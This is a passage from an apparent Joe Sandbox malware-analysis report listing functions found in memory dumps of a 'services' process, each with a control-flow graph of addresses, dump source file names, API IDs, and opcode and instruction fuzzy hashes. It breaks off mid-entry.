                                                                control_flow_graph 579 7ff8496849a0-7ff8496849c3 582 7ff849684a51 579->582 584 7ff849684a5c-7ff849684a9f 582->584 586 7ff849684aa1-7ff849684ba7 584->586 592 7ff849684c8c-7ff849684c9b 586->592 593 7ff849684cd7-7ff849684cf4 586->593 594 7ff849684fe8-7ff849684ff9 592->594 595 7ff849684cfa-7ff849684d09 593->595 596 7ff849685001-7ff849685068 593->596 594->596 595->592 597 7ff849684d0b-7ff849684d0f 595->597 601 7ff8496851d8 596->601 597->586 598 7ff849684d15 597->598 600 7ff849684d93-7ff849684da0 598->600 600->594 602 7ff849684d17-7ff849684d32 call 7ff8496849a0 600->602 601->601 602->600
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UAWA
                                                                • API String ID: 0-1492024814
                                                                • Opcode ID: 327f64d1a2dbe00397d415c5b47e624a3191acedbda5f21c88acd96ec139364e
                                                                • Instruction ID: 85bce73ecee592204a294b23b39a543c21511dc846adbc7604961d857e3286a3
                                                                • Opcode Fuzzy Hash: 327f64d1a2dbe00397d415c5b47e624a3191acedbda5f21c88acd96ec139364e
                                                                • Instruction Fuzzy Hash: 5151CE30D0D6899FDB69EF688458BB97BA0FF09340F0141FED80DD7292EA386984CB41
                                                                Function 00007FF8496428E8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 604 7ff8496428e8-7ff849642900 606 7ff849642908-7ff849642933 604->606 610 7ff84964295c-7ff849642962 606->610 611 7ff849642969-7ff84964296f 610->611 612 7ff849642971-7ff849642976 611->612 613 7ff849642935-7ff84964294e 611->613 616 7ff84964297c-7ff8496429b1 612->616 617 7ff849642863-7ff8496428a8 612->617 614 7ff849642a45-7ff849642a55 613->614 615 7ff849642954-7ff849642959 613->615 623 7ff849642a58-7ff849642aa6 614->623 624 7ff849642a57 614->624 615->610 617->611 621 7ff8496428ae-7ff8496428b4 617->621 625 7ff8496428b6 621->625 626 7ff849642865-7ff849642a3d 621->626 624->623 629 7ff8496428df-7ff8496428e6 625->629 626->614 629->604 630 7ff8496428b8-7ff8496428d1 629->630 630->614 633 7ff8496428d7-7ff8496428dc 630->633 633->629
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 7ddda44452cd04d1eea5e122c31aa36475aecd14291e1b92afdb62876bd8a47b
                                                                • Instruction ID: 1df2bc9ae0b98a7f3b26b6a135ecffcde160fdd7dea6b6e6935ccb475ee3249f
                                                                • Opcode Fuzzy Hash: 7ddda44452cd04d1eea5e122c31aa36475aecd14291e1b92afdb62876bd8a47b
                                                                • Instruction Fuzzy Hash: 87513A30D0D68A9FDB69EFA8C4955BDB7B1FF58340F2040BAC40AE7286CB386945CB55
                                                                Function 00007FF849684828 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 636 7ff849684828-7ff849684835 637 7ff84968483c-7ff849684847 636->637 638 7ff849684849-7ff849684860 637->638 639 7ff849684886-7ff849684895 637->639 640 7ff84968496f-7ff849684999 638->640 641 7ff849684866-7ff849684882 638->641 639->640 642 7ff84968489b-7ff8496848bf 639->642 641->638 643 7ff849684884 641->643 644 7ff8496848c2-7ff8496848df 642->644 646 7ff849684902-7ff849684918 643->646 644->640 647 7ff8496848e5-7ff849684900 644->647 646->640 648 7ff84968491a-7ff84968491e 646->648 647->644 647->646 649 7ff849684922-7ff849684929 648->649 650 7ff84968492f-7ff84968493d 649->650 651 7ff8496847fd-7ff849684803 649->651 652 7ff84968493f 650->652 653 7ff849684944-7ff849684955 650->653 651->640 654 7ff849684809-7ff849684818 651->654 652->653 654->649 655 7ff84968481e-7ff849684825 654->655 655->636 655->640
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UAWA
                                                                • API String ID: 0-1492024814
                                                                • Opcode ID: 917cb971cdd1ccd89a9c47ac419425a66eea64db16638b393b799044c3b47fd6
                                                                • Instruction ID: 979114078ac63b1d32fc3999a0f5e3bbc71c16d37aa729c8980d1460533f0255
                                                                • Opcode Fuzzy Hash: 917cb971cdd1ccd89a9c47ac419425a66eea64db16638b393b799044c3b47fd6
                                                                • Instruction Fuzzy Hash: CC51D23051A6958FEB99DF18C0D05B03BA1FF45350B9155BDCC5ACB68BE778E882CB40
                                                                Function 00007FF8490EEBC9 Relevance: 1.4, APIs: 1, Instructions: 146COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 656 7ff8490eebc9-7ff8490eebd5 657 7ff8490eebd7-7ff8490eebdf 656->657 658 7ff8490eebe0-7ff8490eebe9 656->658 657->658 659 7ff8490eec26-7ff8490eecb2 CloseHandle 658->659 660 7ff8490eebeb-7ff8490eec23 658->660 664 7ff8490eecb4 659->664 665 7ff8490eecba-7ff8490eed0e 659->665 660->659 664->665
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: dc04d157e80a02df412590f13c957b56871ffb163c0296df18420263c6d048ed
                                                                • Instruction ID: 7e9c2212a794a3f5902a8ecf0f21e67ae87e4e52dddef9d2707fca7cc632cb71
                                                                • Opcode Fuzzy Hash: dc04d157e80a02df412590f13c957b56871ffb163c0296df18420263c6d048ed
                                                                • Instruction Fuzzy Hash: A5416C70D0865C8FDF58DFA8D889BEDBBF0FB56310F10416AD049E7292DA34A885CB01
                                                                Function 00007FF84964E99A Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 7cabb05a43e454675f94b09f5ee82bf025b29e6b9bcf102675ddc7761526d340
                                                                • Instruction ID: 9130440b762ee55db021ed7b6213e68e2a27dc2a1e7ab6f344d4c22ab7709810
                                                                • Opcode Fuzzy Hash: 7cabb05a43e454675f94b09f5ee82bf025b29e6b9bcf102675ddc7761526d340
                                                                • Instruction Fuzzy Hash: 26415F30D0D69A9FDB59EFA8C5595BDBBB1FF44340F0441BAC00AE7292CB382945CB55
                                                                Function 00007FF84964C3E3 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{wI
                                                                • API String ID: 0-1212038778
                                                                • Opcode ID: 86629143654d7beb4946e306868f9c21e68c5f2d6543c7c01a5b3ba80a044f74
                                                                • Instruction ID: 35b98c687c41a551333b22d55324c45dc518c15cdbd076034a1f9e68d6bfbad6
                                                                • Opcode Fuzzy Hash: 86629143654d7beb4946e306868f9c21e68c5f2d6543c7c01a5b3ba80a044f74
                                                                • Instruction Fuzzy Hash: DC316B71E1C94A9EEBA4EF98D4455FDBBB1FF58790F500139D00AD3296EF2C68418788
                                                                Function 00007FF84964C428 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{wI
                                                                • API String ID: 0-1212038778
                                                                • Opcode ID: 70aa49666f0d4058428bf269e26e2b6dbff616971b3c52c34fcba74521e9f2cf
                                                                • Instruction ID: 86fb99ee441001903a498b576cb43b4834d06306092481cd8211e10a6cf8eb04
                                                                • Opcode Fuzzy Hash: 70aa49666f0d4058428bf269e26e2b6dbff616971b3c52c34fcba74521e9f2cf
                                                                • Instruction Fuzzy Hash: 47315A71E1C94E9EEBA4EF98C8415FDBBB1FF48390F500139D10AE3295DF2868418788
                                                                Function 00007FF848F41E9C Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: 0f06d6716258b99cc04dbe768d5c98cbfa5db71ee01b9a5653959603ca54b601
                                                                • Instruction ID: 4da273e5a6792456b149dce574f54af4ae80548cbce57463866fde38dc39c5df
                                                                • Opcode Fuzzy Hash: 0f06d6716258b99cc04dbe768d5c98cbfa5db71ee01b9a5653959603ca54b601
                                                                • Instruction Fuzzy Hash: E7E08C30C4842F8AEBA4EB60C8447F9B2A0EF90300F0181FB802FE2081CF342A809A01
                                                                Function 00007FF84964AD10 Relevance: .7, Instructions: 685COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d8835be1b00e7305563b624e2469df6ad686c4e207b8c41aa8b0b12c1d38d2d
                                                                • Instruction ID: 4209fbf840fadc0fcb81134837eef98205a421f3a0a8a003a4d74cce2621676a
                                                                • Opcode Fuzzy Hash: 3d8835be1b00e7305563b624e2469df6ad686c4e207b8c41aa8b0b12c1d38d2d
                                                                • Instruction Fuzzy Hash: 1122C430A0CA598FDBA8EF58C895AB977E2FF54350F5041B9D01EC7292DF24AC42CB84
                                                                Function 00007FF849643BA1 Relevance: .4, Instructions: 411COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93c5a6488234035d0df8d6491cae5440c27d35d8805d95a3ee9562d2d9d430d1
                                                                • Instruction ID: 1bcde402a30521fe42c938c05894ef77526cca007c4f38d0309d085d94a90fd2
                                                                • Opcode Fuzzy Hash: 93c5a6488234035d0df8d6491cae5440c27d35d8805d95a3ee9562d2d9d430d1
                                                                • Instruction Fuzzy Hash: 8BE1E23090DB868FE378EF6CDA919757BE1FF44340B14457EC44AC7682DB29B8428B85
                                                                Function 00007FF84964EC8F Relevance: .4, Instructions: 376COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 44024bcc45d3f47658265a5b0c211e30a163736c32e2ddcbecb7d93e56b6f12a
                                                                • Instruction ID: e8f5799311d3afd856480d81b0c77da61231cd243a54ecffde0e2cb0c86495a5
                                                                • Opcode Fuzzy Hash: 44024bcc45d3f47658265a5b0c211e30a163736c32e2ddcbecb7d93e56b6f12a
                                                                • Instruction Fuzzy Hash: 90E1C03051CA968FEB59DF48C5E45B53BA1FF85340B5446BCD84A8B68BCB38F881CB85
                                                                Function 00007FF84964BB37 Relevance: .4, Instructions: 367COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54d5614b29c80daa05563d7f4c31d4f85c5d79a8e2c98c7552c206d129a1a59e
                                                                • Instruction ID: c70f54014df5ce805092a53e1810d75139ab29c22e255ecc1b121c8ac90a07c1
                                                                • Opcode Fuzzy Hash: 54d5614b29c80daa05563d7f4c31d4f85c5d79a8e2c98c7552c206d129a1a59e
                                                                • Instruction Fuzzy Hash: 46419A3191E99ADEE7A5BEB8AC111FD77A4EF14394F1401BAD00D8A1C3CF2C68418B9D
                                                                Function 00007FF84964ECAF Relevance: .3, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62010d02e3b2bc3d2d0a0e4bf4581f227be194d4b9bc0d1fdd6af35662af0818
                                                                • Instruction ID: 4caec485e572341dd5eeade3219a10d36c815529bd14160181777c01b4a246b9
                                                                • Opcode Fuzzy Hash: 62010d02e3b2bc3d2d0a0e4bf4581f227be194d4b9bc0d1fdd6af35662af0818
                                                                • Instruction Fuzzy Hash: F1C1BE3051C9868FEB6ADF58C1E45B13BA1FF85340B5445BDD84A8B68BCB38F881CB85
                                                                Function 00007FF849642B7F Relevance: .3, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95fb8ffc7fd85c27c840dafc374ac0d152cc72bb3e75c9d1c0f277a340fd5b85
                                                                • Instruction ID: 2c3260195c74a303370b134a10b21ec242a2b5df8f27cbd8b0a42ba0578bd6ac
                                                                • Opcode Fuzzy Hash: 95fb8ffc7fd85c27c840dafc374ac0d152cc72bb3e75c9d1c0f277a340fd5b85
                                                                • Instruction Fuzzy Hash: 36C1AD3051C6868FEB69EF58C4D05B53BA1FF45340BA445BDD85A8B68FCB38E881CB85
                                                                Function 00007FF849642412 Relevance: .3, Instructions: 328COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5baec33d6b8e46c7f22ff7f70b24c46e5f4a864a5eac75d69f529178b4e1aafb
                                                                • Instruction ID: d1a4aed2ca22e063c31a7b8e8ab81a1508120687c9afc8da95949549583f571c
                                                                • Opcode Fuzzy Hash: 5baec33d6b8e46c7f22ff7f70b24c46e5f4a864a5eac75d69f529178b4e1aafb
                                                                • Instruction Fuzzy Hash: E0C1E63090DA869FE759EF68C0906B5B7E1FF59340F644179C04EC7B8ADB28B851CB94
                                                                Function 00007FF849889A44 Relevance: .3, Instructions: 270COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3406849623.00007FF849880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849880000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2166b998ab8f3831d2c29922b6f7f19050ad7857f216b070f67c493907e8a232
                                                                • Instruction ID: f078ea31535d70e3e756f20bd6f130af3048c024f01ae108fbf094cd2dbad729
                                                                • Opcode Fuzzy Hash: 2166b998ab8f3831d2c29922b6f7f19050ad7857f216b070f67c493907e8a232
                                                                • Instruction Fuzzy Hash: 5CB1A770A1896D8FDBA8EF18C895BE9B7B1FB98341F4101E9D40DE3295CE396980CF51
                                                                Function 00007FF84964DA86 Relevance: .3, Instructions: 268COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05c359a32bf8c7e8b617704a04f9554babce67bee3b87af6a459ce00bc31246f
                                                                • Instruction ID: 8b5086fa3f412124ebd649756cd3362c8872d3e108bf3726c15b683ba096f767
                                                                • Opcode Fuzzy Hash: 05c359a32bf8c7e8b617704a04f9554babce67bee3b87af6a459ce00bc31246f
                                                                • Instruction Fuzzy Hash: 1F815431E4CB869FE7386EA894251B97BE4EF45390F14057ED48EC7283DF29B8028759
                                                                Function 00007FF849641946 Relevance: .3, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83e2e71354d1fb43cbf3dfb318ded0d6268f21d0fd3cad842ce5e4fedc043dc1
                                                                • Instruction ID: f7861c0deea8da62d0da255a3dd47022fd1db8ae61419ccc8433ec6ed19f4da8
                                                                • Opcode Fuzzy Hash: 83e2e71354d1fb43cbf3dfb318ded0d6268f21d0fd3cad842ce5e4fedc043dc1
                                                                • Instruction Fuzzy Hash: 45814830A0CB968FE7386EA894459797BE1EF65390F16057FD08EC3182DF29B8428B55
                                                                Function 00007FF849650205 Relevance: .3, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc60ff91b498fffaba4343c129e3acaebfc00c8ad5790711455208677bba5305
                                                                • Instruction ID: f8587bccdbfe4a40e66648e0d9831bf486c2cf75814a9129b00cecad31a3da61
                                                                • Opcode Fuzzy Hash: bc60ff91b498fffaba4343c129e3acaebfc00c8ad5790711455208677bba5305
                                                                • Instruction Fuzzy Hash: 7D712831A0C9498FDB68FE1884469B5B7E1FFA532471402BED44ECB193DE28F846C781
                                                                Function 00007FF84964FCD1 Relevance: .2, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ebf8a6e5d903b555dc64587bcbd97b60730096416a9f7c2b978334c1d091431c
                                                                • Instruction ID: ab4f6546fb783828cd938076effa3d8bb29a99e392107cd64bd81b2ab986fb5c
                                                                • Opcode Fuzzy Hash: ebf8a6e5d903b555dc64587bcbd97b60730096416a9f7c2b978334c1d091431c
                                                                • Instruction Fuzzy Hash: 6991E03094CB869FE3A9EF54C59457177E1FF49340B90497EC48AC7A93CB29B842CB85
                                                                Function 00007FF84964AAFB Relevance: .2, Instructions: 239COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa7a6e83364c68a7effac5b273b27ae58ee4dcd19fc413f40dd59f77e57b9277
                                                                • Instruction ID: 7cd34d9792f65b831e02e27bc94c7ce97cd32f64d21078ed2cbe56b23f55ef5a
                                                                • Opcode Fuzzy Hash: aa7a6e83364c68a7effac5b273b27ae58ee4dcd19fc413f40dd59f77e57b9277
                                                                • Instruction Fuzzy Hash: 77818C30D1D68AAFEBA5EFA888556BCBBA1FF49380F10057AD00ED7281DF286841C755
                                                                Function 00007FF84964B812 Relevance: .2, Instructions: 214COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5df30b381ef36dd9b134d3d6de587b9c4d145d5bab79376b6324d240b78e66a1
                                                                • Instruction ID: 4f418c5da6d91a3b6dc01b09c6cf8e4e8015c77abd50eef35b715df746e8a4e6
                                                                • Opcode Fuzzy Hash: 5df30b381ef36dd9b134d3d6de587b9c4d145d5bab79376b6324d240b78e66a1
                                                                • Instruction Fuzzy Hash: 8E51D47190C4894FEBB8FE68CC565BD37D8FF45351B0402B9D05EC7592DF18A8168786
                                                                Function 00007FF849642EF0 Relevance: .2, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7853fd889c0ef6fd72a835691b787120064568ed5b08986184a3ed0aca9ab3c4
                                                                • Instruction ID: 35b9c0adcc775753cb340f1b6e79eea45fc76dfb5e6be8d88d84177337e9a1c0
                                                                • Opcode Fuzzy Hash: 7853fd889c0ef6fd72a835691b787120064568ed5b08986184a3ed0aca9ab3c4
                                                                • Instruction Fuzzy Hash: 10512530D1C5AA8EEBB9AF6884257B8B7A1FF54340F5485B9C04EC71CACF3C69848B45
                                                                Function 00007FF848F4090D Relevance: .2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 36e9f5424ace52e896505d91340bc3e0a258e7ddf41b2c86ed9e12f0c2bbe2f7
                                                                • Instruction ID: 287f2f8c97fe885e324d2c332259f75099e0c4edbf50a0ebe0b555f8d922a96d
                                                                • Opcode Fuzzy Hash: 36e9f5424ace52e896505d91340bc3e0a258e7ddf41b2c86ed9e12f0c2bbe2f7
                                                                • Instruction Fuzzy Hash: 4251AC3191865D9FDB84FFA8E4856FDBBA0FF58354F10017AD009E7296DB38A881CB94
                                                                Function 00007FF849658A1E Relevance: .1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93b9e55cea7c59d027b2b4c9120132b5327cd71a67fc47f918436d92bdfd3341
                                                                • Instruction ID: 0fb34faf40cdeeaa6fe3cb5944d590a740bf95e07a8de728907606248bf8fe44
                                                                • Opcode Fuzzy Hash: 93b9e55cea7c59d027b2b4c9120132b5327cd71a67fc47f918436d92bdfd3341
                                                                • Instruction Fuzzy Hash: B141D331A0C7858FE778BE18B845079B7D5EF853F1B10193FE88FC3692D929AC424642
                                                                Function 00007FF84999A1BB Relevance: .1, Instructions: 142COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3409530622.00007FF849990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849990000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18f4426e71faf6001c8a0d32c4abb1c793289258b2253f98f7cb9fd2cf24c233
                                                                • Instruction ID: 334e8bec1cdc520a6365174e54011260e10aeb0dedf3917e6379c36e66ff380d
                                                                • Opcode Fuzzy Hash: 18f4426e71faf6001c8a0d32c4abb1c793289258b2253f98f7cb9fd2cf24c233
                                                                • Instruction Fuzzy Hash: 94510C30D1DA598FEBA8EF18C859BA9BBA1FF68344F5041B9C00DE3295CE356985CF40
                                                                Function 00007FF848F40960 Relevance: .1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c5b15e359e2787e09cbc2f3e07ca865a8d750faca3d624bdf21d959ff77f14d
                                                                • Instruction ID: b4270ffdf515124234947cd4db8bfe3feae7728c49cb8763f499f528f2375e5d
                                                                • Opcode Fuzzy Hash: 2c5b15e359e2787e09cbc2f3e07ca865a8d750faca3d624bdf21d959ff77f14d
                                                                • Instruction Fuzzy Hash: 95414A30918A1D9FDB84FF58D485AEDB7A1FF58355F00017AD40DE3296DF38A8818B94
                                                                Function 00007FF848F40905 Relevance: .1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
                                                                • Instruction ID: b63265942d09398d9b7cf7a8fec97cf9c19597445bbc01e1415b68cc1406f55e
                                                                • Opcode Fuzzy Hash: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
                                                                • Instruction Fuzzy Hash: 3D517A30A18A0D9FCF84EF58D484AEDBBF1FF68355F050569E409E7261DB34E9908B94
                                                                Function 00007FF84964B46C Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
